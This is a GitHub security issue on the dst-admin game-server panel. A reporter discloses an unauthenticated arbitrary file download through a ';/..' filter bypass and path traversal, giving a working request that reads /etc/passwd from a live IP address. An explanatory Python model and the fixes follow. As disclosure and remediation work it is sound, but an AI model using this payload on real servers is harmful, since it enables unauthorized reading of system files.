qinming99 / dst-admin

Admin backend for Don't Starve Together (饥荒联机版) on the Steam platform
MIT License

A security issue #28

Closed hackerhackrat closed 2 years ago

hackerhackrat commented 2 years ago

Hi, guys! There is a serious security problem in your code. A few weeks ago, I found a function in your website backend that can lead to arbitrary file download, but it required an account and password. However, I found a new way to download any file unauthenticated. That means I can download any file without authorization, without using an account and password. Here is the example:


Target: http://106.15.186.197:8080

And the HTTP data is:

GET /images;/../backup/download?fileName=../../../../../../../../etc/passwd HTTP/1.1
Host: 106.15.186.197:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

PoC: /images;/../backup/download?fileName=../../../../../../../../etc/passwd

Remember to use Burp Suite, not a browser. Have a nice day!
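The request above chains two weaknesses: the `;` path parameter makes the raw URI look like a static `/images` resource to a prefix-based login filter while the container strips the parameter and collapses `..` before routing it to `/backup/download`, and the handler then joins `fileName` onto the backup directory without checking the result stays inside it. The following Python model, added here for this page and not taken from dst-admin's source, shows both halves beside their fixes. The whitelist `PUBLIC_PREFIXES`, the route name, the `handle()` request flow and the temporary file tree are all assumptions made for the illustration, not facts about the project.

```python
"""Model of the report above: a prefix auth check on the raw URI plus a
download handler that joins user input onto the backup directory.  Added
illustration for this page, not dst-admin's code; the whitelist, route name
and file layout are assumptions."""
import posixpath
import tempfile
from pathlib import Path

# Assumed static-resource whitelist that the login filter lets through.
PUBLIC_PREFIXES = ("/images", "/css", "/js")
DOWNLOAD_ROUTE = "/backup/download"  # assumed route name


def container_normalize(raw_path: str) -> str:
    """Approximate what a servlet container does before routing: drop the
    ';param' path parameter from each segment, then collapse '.' and '..'.
    '/images;/../backup/download' becomes '/backup/download'."""
    segments = []
    for seg in raw_path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg:
            segments.append(seg)
    return posixpath.normpath("/" + "/".join(segments))


def _under_prefix(path: str, prefixes) -> bool:
    """Segment-aware prefix match so '/imagesX' does not match '/images'."""
    return any(path == p or path.startswith(p + "/") for p in prefixes)


def naive_filter_allows(raw_path: str, authenticated: bool) -> bool:
    """Vulnerable: decides on the raw URI, which still carries the ';' trick,
    so the request looks like a static image and is waved through."""
    return authenticated or raw_path.startswith(PUBLIC_PREFIXES)


def hardened_filter_allows(raw_path: str, authenticated: bool) -> bool:
    """Fix: refuse URIs whose normalized form differs from what was sent
    (path parameters, '..', '//'), then decide on the normalized path."""
    normalized = container_normalize(raw_path)
    if ";" in raw_path or normalized != raw_path:
        return False
    return authenticated or _under_prefix(normalized, PUBLIC_PREFIXES)


def vulnerable_read(backup_dir: Path, file_name: str) -> bytes:
    """Vulnerable: '..' in fileName walks out of the backup directory."""
    return (backup_dir / file_name).read_bytes()


def safe_read(backup_dir: Path, file_name: str) -> bytes:
    """Fix: resolve the final path and insist it stays inside the backup
    directory (catches '..', absolute names and symlinks out of the tree)."""
    base = backup_dir.resolve()
    target = (base / file_name).resolve()
    if not target.is_relative_to(base):  # Python 3.9+
        raise PermissionError(f"refusing path outside backup dir: {file_name}")
    return target.read_bytes()


def make_sample_tree() -> Path:
    """Constructed fixture: backup/save.zip is the legitimate download and
    secret.txt (outside backup/) stands in for /etc/passwd."""
    root = Path(tempfile.mkdtemp(prefix="dst-admin-demo-"))
    (root / "backup").mkdir()
    (root / "backup" / "save.zip").write_bytes(b"PK-demo-backup")
    (root / "secret.txt").write_bytes(b"root:x:0:0:root:/root:/bin/sh\n")
    return root


def handle(raw_path: str, file_name: str, authenticated: bool,
           root: Path, hardened: bool):
    """One request through filter -> router -> handler. Returns (status, body)."""
    allows = hardened_filter_allows if hardened else naive_filter_allows
    if not allows(raw_path, authenticated):
        return 401, b""
    if container_normalize(raw_path) != DOWNLOAD_ROUTE:
        return 404, b""
    reader = safe_read if hardened else vulnerable_read
    try:
        return 200, reader(root / "backup", file_name)
    except (PermissionError, FileNotFoundError):
        return 403, b""


if __name__ == "__main__":
    demo_root = make_sample_tree()
    poc = "/images;/../backup/download"
    print("vulnerable:", handle(poc, "../secret.txt", False, demo_root, hardened=False))
    print("hardened:  ", handle(poc, "../secret.txt", False, demo_root, hardened=True))
```

The two fixes are independent and both are needed: normalizing before the auth decision closes the unauthenticated bypass, and the resolve-then-contain check in `safe_read` closes the authenticated traversal the reporter found first. Checking for the literal `..` substring is not a substitute for the containment check, since encoded or absolute inputs get past it.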

qinming99 commented 2 years ago

Fixed in v1.3.1!